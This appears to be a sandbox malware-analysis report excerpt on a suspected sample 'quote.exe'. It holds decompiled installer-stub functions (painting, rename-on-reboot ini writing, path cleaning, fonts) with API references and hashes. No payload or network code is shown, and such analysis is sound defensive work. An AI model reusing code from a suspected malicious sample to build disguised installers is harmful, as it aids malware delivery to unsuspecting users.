                                                                                      0x00401165
                                                                                      0x00401110
                                                                                      0x0040116e
                                                                                      0x00000000
                                                                                      0x00401178
                                                                                      0x00401010
                                                                                      0x00401013
                                                                                      0x00401015
                                                                                      0x0040101f
                                                                                      0x0040101f
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                      • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                      • String ID: F
                                                                                      • API String ID: 941294808-1304234792
                                                                                      • Opcode ID: b27a2b551f63a02a5ae57bcc50d46a19120317da1eaca0d31fe5953092f3d4ab
                                                                                      • Instruction ID: eaab19ccb9cda740c31967da28403833e1322962c0e6ee158e4036cb66a51054
                                                                                      • Opcode Fuzzy Hash: b27a2b551f63a02a5ae57bcc50d46a19120317da1eaca0d31fe5953092f3d4ab
                                                                                      • Instruction Fuzzy Hash: ED418B71800209AFCF058FA5CE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040605D(void* __ecx) {
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				long _t12;
                                                                                      				long _t24;
                                                                                      				char* _t31;
                                                                                      				int _t37;
                                                                                      				void* _t38;
                                                                                      				intOrPtr* _t39;
                                                                                      				long _t42;
                                                                                      				WCHAR* _t44;
                                                                                      				void* _t46;
                                                                                      				void* _t48;
                                                                                      				void* _t49;
                                                                                      				void* _t52;
                                                                                      				void* _t53;
                                                                                      
                                                                                      				_t38 = __ecx;
                                                                                      				_t44 =  *(_t52 + 0x14);
                                                                                      				 *0x430908 = 0x55004e;
                                                                                      				 *0x43090c = 0x4c;
                                                                                      				if(_t44 == 0) {
                                                                                      					L3:
                                                                                      					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
                                                                                      					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                      						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
                                                                                      						_t53 = _t52 + 0x10;
                                                                                      						E0040644E(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f14 + 0x128)));
                                                                                      						_t12 = E00405F07(0x431108, 0xc0000000, 4);
                                                                                      						_t48 = _t12;
                                                                                      						 *(_t53 + 0x18) = _t48;
                                                                                      						if(_t48 != 0xffffffff) {
                                                                                      							_t42 = GetFileSize(_t48, 0);
                                                                                      							_t6 = _t37 + 0xa; // 0xa
                                                                                      							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                      							if(_t46 == 0 || E00405F8A(_t48, _t46, _t42) == 0) {
                                                                                      								L18:
                                                                                      								return CloseHandle(_t48);
                                                                                      							} else {
                                                                                      								if(E00405E6C(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                      									_t49 = E00405E6C(_t38, _t21 + 0xa, "\n[");
                                                                                      									if(_t49 == 0) {
                                                                                      										_t48 =  *(_t53 + 0x18);
                                                                                      										L16:
                                                                                      										_t24 = _t42;
                                                                                      										L17:
                                                                                      										E00405EC2(_t24 + _t46, 0x430508, _t37);
                                                                                      										SetFilePointer(_t48, 0, 0, 0);
                                                                                      										E00405FB9(_t48, _t46, _t42 + _t37);
                                                                                      										GlobalFree(_t46);
                                                                                      										goto L18;
                                                                                      									}
                                                                                      									_t39 = _t46 + _t42;
                                                                                      									_t31 = _t39 + _t37;
                                                                                      									while(_t39 > _t49) {
                                                                                      										 *_t31 =  *_t39;
                                                                                      										_t31 = _t31 - 1;
                                                                                      										_t39 = _t39 - 1;
                                                                                      									}
                                                                                      									_t24 = _t49 - _t46 + 1;
                                                                                      									_t48 =  *(_t53 + 0x18);
                                                                                      									goto L17;
                                                                                      								}
                                                                                      								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                      								_t42 = _t42 + 0xa;
                                                                                      								goto L16;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				} else {
                                                                                      					CloseHandle(E00405F07(_t44, 0, 1));
                                                                                      					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
                                                                                      					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                      						goto L3;
                                                                                      					}
                                                                                      				}
                                                                                      				return _t12;
                                                                                      			}



















                                                                                      0x0040605d
                                                                                      0x00406066
                                                                                      0x0040606d
                                                                                      0x00406077
                                                                                      0x0040608b
                                                                                      0x004060b3
                                                                                      0x004060be
                                                                                      0x004060c2
                                                                                      0x004060e2
                                                                                      0x004060e9
                                                                                      0x004060f3
                                                                                      0x00406100
                                                                                      0x00406105
                                                                                      0x0040610a
                                                                                      0x0040610e
                                                                                      0x0040611d
                                                                                      0x0040611f
                                                                                      0x0040612c
                                                                                      0x00406130
                                                                                      0x004061cb
                                                                                      0x00000000
                                                                                      0x00406146
                                                                                      0x00406153
                                                                                      0x00406177
                                                                                      0x0040617b
                                                                                      0x0040619a
                                                                                      0x0040619e
                                                                                      0x0040619e
                                                                                      0x004061a0
                                                                                      0x004061a9
                                                                                      0x004061b4
                                                                                      0x004061bf
                                                                                      0x004061c5
                                                                                      0x00000000
                                                                                      0x004061c5
                                                                                      0x0040617d
                                                                                      0x00406180
                                                                                      0x0040618b
                                                                                      0x00406187
                                                                                      0x00406189
                                                                                      0x0040618a
                                                                                      0x0040618a
                                                                                      0x00406192
                                                                                      0x00406194
                                                                                      0x00000000
                                                                                      0x00406194
                                                                                      0x0040615e
                                                                                      0x00406164
                                                                                      0x00000000
                                                                                      0x00406164
                                                                                      0x00406130
                                                                                      0x0040610e
                                                                                      0x0040608d
                                                                                      0x00406098
                                                                                      0x004060a1
                                                                                      0x004060a5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004060a5
                                                                                      0x004061d6

                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061F8,?,?), ref: 00406098
                                                                                      • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004060A1
                                                                                        • Part of subcall function 00405E6C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                        • Part of subcall function 00405E6C: lstrlenA.KERNEL32(00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EAE
                                                                                      • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004060BE
                                                                                      • wsprintfA.USER32 ref: 004060DC
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00406117
                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406126
                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040615E
                                                                                      • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004061B4
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004061C5
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061CC
                                                                                        • Part of subcall function 00405F07: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\quote.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405F0B
                                                                                        • Part of subcall function 00405F07: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F2D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                      • String ID: %ls=%ls$[Rename]
                                                                                      • API String ID: 2171350718-461813615
                                                                                      • Opcode ID: 2734070b275057de67ac1042ac82e2258b5e7089bd79c64c1e0f06eaf1381cfe
                                                                                      • Instruction ID: d46549913b6b20842cf1787bef5cc60fb31ae9cbf3b8bb231415db86ef2d3bba
                                                                                      • Opcode Fuzzy Hash: 2734070b275057de67ac1042ac82e2258b5e7089bd79c64c1e0f06eaf1381cfe
                                                                                      • Instruction Fuzzy Hash: 9D3135712017157BD2206B218D48F6B3A5CDF45754F15003AFE82FA2C3DA3CE9218ABD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 91%
                                                                                      			E004066C0(WCHAR* _a4) {
                                                                                      				short _t5;
                                                                                      				short _t7;
                                                                                      				WCHAR* _t19;
                                                                                      				WCHAR* _t20;
                                                                                      				WCHAR* _t21;
                                                                                      
                                                                                      				_t20 = _a4;
                                                                                      				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                                      					_t20 =  &(_t20[4]);
                                                                                      				}
                                                                                      				if( *_t20 != 0 && E00405D5D(_t20) != 0) {
                                                                                      					_t20 =  &(_t20[2]);
                                                                                      				}
                                                                                      				_t5 =  *_t20;
                                                                                      				_t21 = _t20;
                                                                                      				_t19 = _t20;
                                                                                      				if(_t5 != 0) {
                                                                                      					do {
                                                                                      						if(_t5 > 0x1f &&  *((short*)(E00405D13(L"*?|<>/\":", _t5))) == 0) {
                                                                                      							E00405EC2(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                                      							_t19 = CharNextW(_t19);
                                                                                      						}
                                                                                      						_t20 = CharNextW(_t20);
                                                                                      						_t5 =  *_t20;
                                                                                      					} while (_t5 != 0);
                                                                                      				}
                                                                                      				 *_t19 =  *_t19 & 0x00000000;
                                                                                      				while(1) {
                                                                                      					_push(_t19);
                                                                                      					_push(_t21);
                                                                                      					_t19 = CharPrevW();
                                                                                      					_t7 =  *_t19;
                                                                                      					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                      						break;
                                                                                      					}
                                                                                      					 *_t19 =  *_t19 & 0x00000000;
                                                                                      					if(_t21 < _t19) {
                                                                                      						continue;
                                                                                      					}
                                                                                      					break;
                                                                                      				}
                                                                                      				return _t7;
                                                                                      			}








                                                                                      0x004066c2
                                                                                      0x004066cb
                                                                                      0x004066e2
                                                                                      0x004066e2
                                                                                      0x004066e9
                                                                                      0x004066f5
                                                                                      0x004066f5
                                                                                      0x004066f8
                                                                                      0x004066fb
                                                                                      0x00406700
                                                                                      0x00406702
                                                                                      0x0040670b
                                                                                      0x0040670f
                                                                                      0x0040672c
                                                                                      0x00406734
                                                                                      0x00406734
                                                                                      0x00406739
                                                                                      0x0040673b
                                                                                      0x0040673e
                                                                                      0x00406743
                                                                                      0x00406744
                                                                                      0x00406748
                                                                                      0x00406748
                                                                                      0x00406749
                                                                                      0x00406750
                                                                                      0x00406752
                                                                                      0x00406759
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406761
                                                                                      0x00406767
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406767
                                                                                      0x0040676c

                                                                                      APIs
                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75A33420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\quote.exe" ,004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00406723
                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406732
                                                                                      • CharNextW.USER32(?,00000000,75A33420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\quote.exe" ,004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00406737
                                                                                      • CharPrevW.USER32(?,?,75A33420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\quote.exe" ,004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 0040674A
                                                                                      Strings
                                                                                      • *?|<>/":, xrefs: 00406712
                                                                                      • "C:\Users\user\Desktop\quote.exe" , xrefs: 004066C0
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004066C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$Prev
                                                                                      • String ID: "C:\Users\user\Desktop\quote.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 589700163-2542987868
                                                                                      • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                                      • Instruction ID: 9627fccf098e727a5900f08bdddf05a21b4f43d755832024a56349c67539c63f
                                                                                      • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                                      • Instruction Fuzzy Hash: F2110D1580061295DB303B548C84A7B62F8EF5879CF52843FED96732C0E77D8C9286BD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004043CE(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                      				struct tagLOGBRUSH _v16;
                                                                                      				long _t39;
                                                                                      				long _t41;
                                                                                      				void* _t44;
                                                                                      				signed char _t50;
                                                                                      				long* _t54;
                                                                                      
                                                                                      				if(_a4 + 0xfffffecd > 5) {
                                                                                      					L18:
                                                                                      					return 0;
                                                                                      				}
                                                                                      				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                                                      				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                                      					goto L18;
                                                                                      				} else {
                                                                                      					_t50 = _t54[5];
                                                                                      					if((_t50 & 0xffffffe0) != 0) {
                                                                                      						goto L18;
                                                                                      					}
                                                                                      					_t39 =  *_t54;
                                                                                      					if((_t50 & 0x00000002) != 0) {
                                                                                      						_t39 = GetSysColor(_t39);
                                                                                      					}
                                                                                      					if((_t54[5] & 0x00000001) != 0) {
                                                                                      						SetTextColor(_a8, _t39);
                                                                                      					}
                                                                                      					SetBkMode(_a8, _t54[4]);
                                                                                      					_t41 = _t54[1];
                                                                                      					_v16.lbColor = _t41;
                                                                                      					if((_t54[5] & 0x00000008) != 0) {
                                                                                      						_t41 = GetSysColor(_t41);
                                                                                      						_v16.lbColor = _t41;
                                                                                      					}
                                                                                      					if((_t54[5] & 0x00000004) != 0) {
                                                                                      						SetBkColor(_a8, _t41);
                                                                                      					}
                                                                                      					if((_t54[5] & 0x00000010) != 0) {
                                                                                      						_v16.lbStyle = _t54[2];
                                                                                      						_t44 = _t54[3];
                                                                                      						if(_t44 != 0) {
                                                                                      							DeleteObject(_t44);
                                                                                      						}
                                                                                      						_t54[3] = CreateBrushIndirect( &_v16);
                                                                                      					}
                                                                                      					return _t54[3];
                                                                                      				}
                                                                                      			}









                                                                                      0x004043e0
                                                                                      0x00404496
                                                                                      0x00000000
                                                                                      0x00404496
                                                                                      0x004043f1
                                                                                      0x004043f5
                                                                                      0x00000000
                                                                                      0x0040440f
                                                                                      0x0040440f
                                                                                      0x00404418
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040441a
                                                                                      0x00404426
                                                                                      0x00404429
                                                                                      0x00404429
                                                                                      0x0040442f
                                                                                      0x00404435
                                                                                      0x00404435
                                                                                      0x00404441
                                                                                      0x00404447
                                                                                      0x0040444e
                                                                                      0x00404451
                                                                                      0x00404454
                                                                                      0x00404456
                                                                                      0x00404456
                                                                                      0x0040445e
                                                                                      0x00404464
                                                                                      0x00404464
                                                                                      0x0040446e
                                                                                      0x00404473
                                                                                      0x00404476
                                                                                      0x0040447b
                                                                                      0x0040447e
                                                                                      0x0040447e
                                                                                      0x0040448e
                                                                                      0x0040448e
                                                                                      0x00000000
                                                                                      0x00404491

                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004043EB
                                                                                      • GetSysColor.USER32(00000000), ref: 00404429
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00404435
                                                                                      • SetBkMode.GDI32(?,?), ref: 00404441
                                                                                      • GetSysColor.USER32(?), ref: 00404454
                                                                                      • SetBkColor.GDI32(?,?), ref: 00404464
                                                                                      • DeleteObject.GDI32(?), ref: 0040447E
                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404488
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2320649405-0
                                                                                      • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                                      • Instruction ID: dd0feedb065fecc26b382c70af4fe1a3d395924493241b124500faa7aa9dc668
                                                                                      • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                                      • Instruction Fuzzy Hash: 7C2174B15007059BCB30DF78DA08B5BBBF8AF81714B05892EE992B26E1D734E904DB58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00404D22(struct HWND__* _a4, intOrPtr _a8) {
                                                                                      				long _v8;
                                                                                      				signed char _v12;
                                                                                      				unsigned int _v16;
                                                                                      				void* _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				long _v56;
                                                                                      				void* _v60;
                                                                                      				long _t15;
                                                                                      				unsigned int _t19;
                                                                                      				signed int _t25;
                                                                                      				struct HWND__* _t28;
                                                                                      
                                                                                      				_t28 = _a4;
                                                                                      				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                                      				if(_a8 == 0) {
                                                                                      					L4:
                                                                                      					_v56 = _t15;
                                                                                      					_v60 = 4;
                                                                                      					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                                                      					return _v24;
                                                                                      				}
                                                                                      				_t19 = GetMessagePos();
                                                                                      				_v16 = _t19 >> 0x10;
                                                                                      				_v20 = _t19;
                                                                                      				ScreenToClient(_t28,  &_v20);
                                                                                      				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                                      				if((_v12 & 0x00000066) != 0) {
                                                                                      					_t15 = _v8;
                                                                                      					goto L4;
                                                                                      				}
                                                                                      				return _t25 | 0xffffffff;
                                                                                      			}














                                                                                      0x00404d30
                                                                                      0x00404d3d
                                                                                      0x00404d43
                                                                                      0x00404d81
                                                                                      0x00404d81
                                                                                      0x00404d90
                                                                                      0x00404d97
                                                                                      0x00000000
                                                                                      0x00404d99
                                                                                      0x00404d45
                                                                                      0x00404d54
                                                                                      0x00404d5c
                                                                                      0x00404d5f
                                                                                      0x00404d71
                                                                                      0x00404d77
                                                                                      0x00404d7e
                                                                                      0x00000000
                                                                                      0x00404d7e
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D3D
                                                                                      • GetMessagePos.USER32 ref: 00404D45
                                                                                      • ScreenToClient.USER32(?,?), ref: 00404D5F
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D71
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D97
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Send$ClientScreen
                                                                                      • String ID: f
                                                                                      • API String ID: 41195575-1993550816
                                                                                      • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                      • Instruction ID: 7205eec21020573454be23e67ac2b5f41aa1c09cc3aa20a5ad054807a565c042
                                                                                      • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                      • Instruction Fuzzy Hash: 63014C71900219BADB00DBA4DD85BFEBBBCAF54B11F10012BBA50F61C0D7B49A058BA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 73%
                                                                                      			E00401E4E(intOrPtr __edx) {
                                                                                      				void* __edi;
                                                                                      				int _t9;
                                                                                      				signed char _t15;
                                                                                      				struct HFONT__* _t18;
                                                                                      				intOrPtr _t30;
                                                                                      				void* _t31;
                                                                                      				struct HDC__* _t33;
                                                                                      				void* _t35;
                                                                                      
                                                                                      				_t30 = __edx;
                                                                                      				_t33 = GetDC( *(_t35 - 8));
                                                                                      				_t9 = E00402D1C(2);
                                                                                      				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                      				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                                                      				ReleaseDC( *(_t35 - 8), _t33);
                                                                                      				 *0x40ce00 = E00402D1C(3);
                                                                                      				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                                                      				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                      				 *0x40ce07 = 1;
                                                                                      				 *0x40ce04 = _t15 & 0x00000001;
                                                                                      				 *0x40ce05 = _t15 & 0x00000002;
                                                                                      				 *0x40ce06 = _t15 & 0x00000004;
                                                                                      				E0040644E(_t9, _t31, _t33, "Tahoma",  *((intOrPtr*)(_t35 - 0x2c)));
                                                                                      				_t18 = CreateFontIndirectW(0x40cdf0);
                                                                                      				_push(_t18);
                                                                                      				_push(_t31);
                                                                                      				E00406358();
                                                                                      				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t35 - 4));
                                                                                      				return 0;
                                                                                      			}











                                                                                      0x00401e4e
                                                                                      0x00401e59
                                                                                      0x00401e5b
                                                                                      0x00401e68
                                                                                      0x00401e7f
                                                                                      0x00401e84
                                                                                      0x00401e91
                                                                                      0x00401e96
                                                                                      0x00401e9a
                                                                                      0x00401ea5
                                                                                      0x00401eac
                                                                                      0x00401ebe
                                                                                      0x00401ec4
                                                                                      0x00401ec9
                                                                                      0x00401ed3
                                                                                      0x00402630
                                                                                      0x0040156d
                                                                                      0x00402b08
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • GetDC.USER32(?), ref: 00401E51
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
